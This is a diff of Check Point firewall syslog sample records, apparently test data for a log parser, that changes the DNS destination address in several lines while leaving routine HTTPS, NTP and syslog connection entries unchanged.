 <134>1 2020-03-29T17:03:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50093"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:03:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50094"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:03:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4e1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50095"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"13.224.227.39"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58636"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501424"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501424"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46306"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"34.98.75.36"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35972"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:03:45Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4f1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:03:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35675"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -2492,81 +2492,81 @@
 <134>1 2020-03-29T17:21:22Z gw-da58d3 CheckPoint 8363 - [flags:"393216"; ifdir:"inbound"; loguid:"{0x5e80d913,0x3,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={237AAAA3-CA95-A941-82DA-D980A933F6A5};mgmt=gw-da58d3;date=1585501515;policy_name=InitialPolicy\]"; fw_message:"Parameter 'Connections hash table size' changed from 32768 to 8388608"; product:"VPN-1 & FireWall-1"]
 <134>1 2020-03-29T17:21:22Z gw-da58d3 CheckPoint 8363 - [flags:"393216"; ifdir:"inbound"; loguid:"{0x5e80d913,0x4,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={237AAAA3-CA95-A941-82DA-D980A933F6A5};mgmt=gw-da58d3;date=1585501515;policy_name=InitialPolicy\]"; fw_message:"Parameter 'Maximum concurrent connections' changed from 25000 to Unlimited"; product:"VPN-1 & FireWall-1"]
 <134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d913,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53590"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35034"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53048"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37259"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53590"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35034"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53048"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37259"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52092"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42958"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38366"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50194"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.95"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38370"; service:"443"; service_id:"https"; src:"192.168.2.2"]
